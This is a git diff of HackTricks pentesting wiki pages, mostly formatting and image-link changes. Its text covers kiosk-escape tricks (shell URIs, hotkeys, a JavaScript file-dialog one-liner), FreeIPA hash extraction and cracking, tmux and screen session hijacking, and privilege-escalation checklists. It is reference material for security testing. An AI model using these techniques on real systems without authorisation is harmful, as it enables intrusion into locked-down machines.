 **Common Dialogs** are those options of **saving a file**, **opening a file**, selecting a font, a color... Most of them will **offer a full Explorer functionality**. This means that you will be able to access Explorer functionalities if you can access these options:
 
@@ -55,26 +56,26 @@ You should check if you can:
 * Get access to restricted areas
 * Execute other apps
 
-## Command Execution
+### Command Execution
 
-Maybe **using a `Open with`** option** you can open/execute some kind of shell.
+Maybe **using a `Open with`** option\*\* you can open/execute some kind of shell.
 
-### Windows
+#### Windows
 
 For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
 
-### \*NIX __
+#### \*NIX \_\_
 
 _bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.github.io)
 
-# Windows
+## Windows
 
-## Bypassing path restrictions
+### Bypassing path restrictions
 
 * **Environment variables**: There are a lot of environment variables that are pointing to some path
 * **Other protocols**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
 * **Symbolic links**
-* **Shortcuts**: CTRL+N (open new session), CTRL+R (Execute Commands), CTRL+SHIFT+ESC (Task Manager),  Windows+E (open explorer), CTRL-B, CTRL-I (Favourites), CTRL-H (History), CTRL-L, CTRL-O (File/Open Dialog), CTRL-P (Print Dialog), CTRL-S (Save As)
+* **Shortcuts**: CTRL+N (open new session), CTRL+R (Execute Commands), CTRL+SHIFT+ESC (Task Manager), Windows+E (open explorer), CTRL-B, CTRL-I (Favourites), CTRL-H (History), CTRL-L, CTRL-O (File/Open Dialog), CTRL-P (Print Dialog), CTRL-S (Save As)
   * Hidden Administrative menu: CTRL-ALT-F8, CTRL-ESC-F9
 * **Shell URIs**: _shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
 * **UNC paths**: Paths to connect to shared folders. You should try to connect to the C$ of the local machine ("\\\127.0.0.1\c$\Windows\System32")
@@ -92,13 +93,13 @@ _bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.git
 | %TMP%                     | %USERDOMAIN%   | %USERNAME%           |
 | %USERPROFILE%             | %WINDIR%       |                      |
 
-## Download Your Binaries
+### Download Your Binaries
 
 Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
 Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
 Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
 
-## Accessing filesystem from the browser
+### Accessing filesystem from the browser
 
 | PATH                | PATH              | PATH               | PATH                |
 | ------------------- | ----------------- | ------------------ | ------------------- |
@@ -110,7 +111,7 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
 | %TEMP%              | %SYSTEMDRIVE%     | %SYSTEMROOT%       | %APPDATA%           |
 | %HOMEDRIVE%         | %HOMESHARE        |                    | <p><br></p>         |
 
-## ShortCuts
+### ShortCuts
 
 * Sticky Keys – Press SHIFT 5 times
 * Mouse Keys – SHIFT+ALT+NUMLOCK
@@ -135,20 +136,20 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
 * CTRL+O – Open File
 * CTRL+S – Save CTRL+N – New RDP / Citrix
 
-## Swipes
+### Swipes
 
 * Swipe from the left side to the right to see all open Windows, minimizing the KIOSK app and accessing the whole OS directly;
 * Swipe from the right side to the left to open Action Center, minimizing the KIOSK app and accessing the whole OS directly;
 * Swipe in from the top edge to make the title bar visible for an app opened in full screen mode;
-* Swipe up from the bottom to show  the taskbar in a full screen app.
+* Swipe up from the bottom to show the taskbar in a full screen app.
 
-## Internet Explorer Tricks
+### Internet Explorer Tricks
 
-### 'Image Toolbar'
+#### 'Image Toolbar'
 
 It's a toolbar that appears on the top-left of image when it's clicked. You will be able to Save, Print, Mailto, Open "My Pictures" in Explorer. The Kiosk needs to be using Internet Explorer.
 
-### Shell Protocol
+#### Shell Protocol
 
 Type this URLs to obtain an Explorer view:
 
@@ -174,47 +175,37 @@ Type this URLs to obtain an Explorer view:
 * `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> My Network Places
 * `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
 
-## Show File Extensions
+### Show File Extensions
 
 Check this page for more information: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
 
-# Browsers tricks
+## Browsers tricks
 
 Backup iKat versions:
 
 [http://swin.es/k/](http://swin.es/k/)\
-[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
+[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\\
 
-Create a common dialog using JavaScript and access file explorer: `document.write('<input/type=file>')`  
-Source: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
+Create a common dialog using JavaScript and access file explorer: `document.write('<input/type=file>')`\
+Source: https://medium.com/@Rend\_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
 
-# iPad
+## iPad
 
-## Gestures and bottoms
+### Gestures and bottoms
 
 * Swipe up with four (or five) fingers / Double-tap Home button: To view the multitask view and change App
-
 * Swipe one way or another with four or five fingers: In order to change to the next/last App
-
 * Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up: To access Home
- 
 * Swipe one finger from the bottom of the screen just 1-2 inches (slow): The dock will appear
-
 * Swipe down from the top of the display with 1 finger: To view your notifications
-
 * Swipe down with 1 finger the top-right corner of the screen: To see iPad Pro's control centre
-
 * Swipe 1 finger from the left of the screen 1-2 inches: To see Today view
-
 * Swipe fast 1 finger from the centre of the screen to the right or left: To change to next/last App
-
 * Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right: To power off
+* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off
+* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed.
 
-* Press the  On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off
-
-* Press the  On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed.
-
-## Shortcuts
+### Shortcuts
 
 You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that could help escaping from the application will be shown here.
 
@@ -231,7 +222,7 @@ You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that
 | ↑   | Up Arrow     |
 | ↓   | Down Arrow   |
 
-### System shortcuts
+#### System shortcuts
 
 These shortcuts are for the visual settings and sound settings, depending on the use of the iPad.
 
@@ -247,7 +238,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
 | F12      | Increase volume                                                                |
 | ⌘ Space  | Display a list of available languages; to choose one, tap the space bar again. |
 
-### iPad navigation
+#### iPad navigation
 
 | Shortcut                                           | Action                                                  |
 | -------------------------------------------------- | ------------------------------------------------------- |
@@ -275,7 +266,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
 | ⌘⇥ (Command-Tab)                                   | Switch back to the original app                         |
 | ←+→, then Option + ← or Option+→                   | Navigate through Dock                                   |
 
-### Safari shortcuts
+#### Safari shortcuts
 
 | Shortcut                | Action                                           |
 | ----------------------- | ------------------------------------------------ |
@@ -292,7 +283,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
 | ⌘]                      | Goes forward one page in your browsing history   |
 | ⌘⇧R                     | Activate Reader Mode                             |
 
-### Mail shortcuts
+#### Mail shortcuts
 
 | Shortcut                   | Action                       |
 | -------------------------- | ---------------------------- |
@@ -303,17 +294,16 @@ These shortcuts are for the visual settings and sound settings, depending on the
 | ⌘.                         | Stop loading the current tab |
 | ⌘⌥F (Command-Option/Alt-F) | Search in your mailbox       |
 
-# References
+## References
 
 * [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
 * [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
 * [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
 * [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
 
+#### [WhiteIntel](https://whiteintel.io)
 
-### [WhiteIntel](https://whiteintel.io)
-
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -332,9 +322,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
-
-
diff --git a/linux-hardening/bypass-bash-restrictions/README.md b/linux-hardening/bypass-bash-restrictions/README.md
index c5fccd0ad..92515ff7b 100644
--- a/linux-hardening/bypass-bash-restrictions/README.md
+++ b/linux-hardening/bypass-bash-restrictions/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
 
 ## Common Limitations Bypasses
 
@@ -368,13 +368,13 @@ If you are inside a filesystem with the **read-only and noexec protections** or
 * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
 * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
 
 <details>
 
diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
index e45cb8c1c..925db79a2 100644
--- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
+++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo
 
 You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/linux-hardening/freeipa-pentesting.md b/linux-hardening/freeipa-pentesting.md
index 218b58079..e6f420519 100644
--- a/linux-hardening/freeipa-pentesting.md
+++ b/linux-hardening/freeipa-pentesting.md
@@ -126,11 +126,11 @@ To crack these hashes:
 
 • If new version of FreeIPA is used, so **PBKDF2\_SHA256** is used: You should decode **base64** -> find PBKDF2\_SHA256 -> it’s **length** is 256 byte. John can work with 256 bits (32 byte) -> SHA-265 used as the pseudo-random function, block size is 32 byte -> you can use only first 256 bit of our PBKDF2\_SHA256 hash -> John The Ripper or hashcat can help you to crack it
 
-<figure><img src="../.gitbook/assets/image (652).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (655).png" alt=""><figcaption></figcaption></figure>
 
 To extract the hashes you need to be **root in the FreeIPA server**, there you can use the tool **`dbscan`** to extract them:
 
-<figure><img src="../.gitbook/assets/image (290).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (293).png" alt=""><figcaption></figcaption></figure>
 
 ### HBAC-Rules <a href="#id-482b" id="id-482b"></a>
 
diff --git a/linux-hardening/linux-environment-variables.md b/linux-hardening/linux-environment-variables.md
index 31612f08d..b3e0ab537 100644
--- a/linux-hardening/linux-environment-variables.md
+++ b/linux-hardening/linux-environment-variables.md
@@ -127,19 +127,19 @@ Change how your prompt looks.
 
 Root:
 
-![](<../.gitbook/assets/image (894).png>)
+![](<../.gitbook/assets/image (897).png>)
 
 Regular user:
 
-![](<../.gitbook/assets/image (737).png>)
+![](<../.gitbook/assets/image (740).png>)
 
 One, two and three backgrounded jobs:
 
-![](<../.gitbook/assets/image (142).png>)
+![](<../.gitbook/assets/image (145).png>)
 
 One background job, one stopped and last command didn't finish correctly:
 
-![](<../.gitbook/assets/image (712).png>)
+![](<../.gitbook/assets/image (715).png>)
 
 **Try Hard Security Group**
 
diff --git a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
index b5a131fbc..1165268a8 100644
--- a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
+++ b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
@@ -1,4 +1,4 @@
-
+# PAM - Pluggable Authentication Modules
 
 <details>
 
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,21 +26,20 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
-
-## Basic Information
+### Basic Information
 
 **PAM (Pluggable Authentication Modules)** acts as a security mechanism that **verifies the identity of users attempting to access computer services**, controlling their access based on various criteria. It's akin to a digital gatekeeper, ensuring that only authorized users can engage with specific services while potentially limiting their usage to prevent system overloads.
 
-### Configuration Files
+#### Configuration Files
 
-- **Solaris and UNIX-based systems** typically utilize a central configuration file located at `/etc/pam.conf`.
-- **Linux systems** prefer a directory approach, storing service-specific configurations within `/etc/pam.d`. For instance, the configuration file for the login service is found at `/etc/pam.d/login`.
+* **Solaris and UNIX-based systems** typically utilize a central configuration file located at `/etc/pam.conf`.
+* **Linux systems** prefer a directory approach, storing service-specific configurations within `/etc/pam.d`. For instance, the configuration file for the login service is found at `/etc/pam.d/login`.
 
 An example of a PAM configuration for the login service might look like this:
 
-```text
+```
 auth required /lib/security/pam_securetty.so
 auth required /lib/security/pam_nologin.so
 auth sufficient /lib/security/pam_ldap.so
@@ -53,35 +52,35 @@ password required /lib/security/pam_pwdb.so use_first_pass
 session required /lib/security/pam_unix_session.so
 ```
 
-### **PAM Management Realms**
+#### **PAM Management Realms**
 
 These realms, or management groups, include **auth**, **account**, **password**, and **session**, each responsible for different aspects of the authentication and session management process:
 
-- **Auth**: Validates user identity, often by prompting for a password.
-- **Account**: Handles account verification, checking for conditions like group membership or time-of-day restrictions.
-- **Password**: Manages password updates, including complexity checks or dictionary attacks prevention.
-- **Session**: Manages actions during the start or end of a service session, such as mounting directories or setting resource limits.
+* **Auth**: Validates user identity, often by prompting for a password.
+* **Account**: Handles account verification, checking for conditions like group membership or time-of-day restrictions.
+* **Password**: Manages password updates, including complexity checks or dictionary attacks prevention.
+* **Session**: Manages actions during the start or end of a service session, such as mounting directories or setting resource limits.
 
-### **PAM Module Controls**
+#### **PAM Module Controls**
 
 Controls dictate the module's response to success or failure, influencing the overall authentication process. These include:
 
-- **Required**: Failure of a required module results in eventual failure, but only after all subsequent modules are checked.
-- **Requisite**: Immediate termination of the process upon failure.
-- **Sufficient**: Success bypasses the rest of the same realm's checks unless a subsequent module fails.
-- **Optional**: Only causes failure if it's the sole module in the stack.
+* **Required**: Failure of a required module results in eventual failure, but only after all subsequent modules are checked.
+* **Requisite**: Immediate termination of the process upon failure.
+* **Sufficient**: Success bypasses the rest of the same realm's checks unless a subsequent module fails.
+* **Optional**: Only causes failure if it's the sole module in the stack.
 
-### Example Scenario
+#### Example Scenario
 
 In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.
 
-## References
+### References
+
 * [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
 
+#### [WhiteIntel](https://whiteintel.io)
 
-### [WhiteIntel](https://whiteintel.io)
-
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -91,7 +90,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@@ -101,9 +99,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
-
-
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
index f0e1df445..a46dbd7c3 100644
--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -167,7 +167,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
 * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
 * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md
index a3101c8e0..a3652fc18 100644
--- a/linux-hardening/privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/README.md
@@ -1277,7 +1277,7 @@ screen -ls
 screen -ls <username>/ # Show another user' screen sessions
 ```
 
-![](<../../.gitbook/assets/image (138).png>)
+![](<../../.gitbook/assets/image (141).png>)
 
 **Attach to a session**
 
@@ -1299,7 +1299,7 @@ ps aux | grep tmux #Search for tmux consoles not using default folder for socket
 tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess
 ```
 
-![](<../../.gitbook/assets/image (834).png>)
+![](<../../.gitbook/assets/image (837).png>)
 
 **Attach to a session**
 
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md
index 77f6e82a8..2b93aca99 100644
--- a/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
 
 ## **Basic Docker Engine Security**
 
@@ -118,13 +118,13 @@ When switching Docker hosts, it's necessary to move the root and repository keys
 
 ***
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
 
 ## Containers Security Features
 
@@ -435,13 +435,13 @@ If you have access to the docker socket or have access to a user in the **docker
 * [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
 * [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
 
 <details>
 
diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md
index 701508815..2c2b5240e 100644
--- a/linux-hardening/privilege-escalation/docker-security/apparmor.md
+++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Basic Information
 
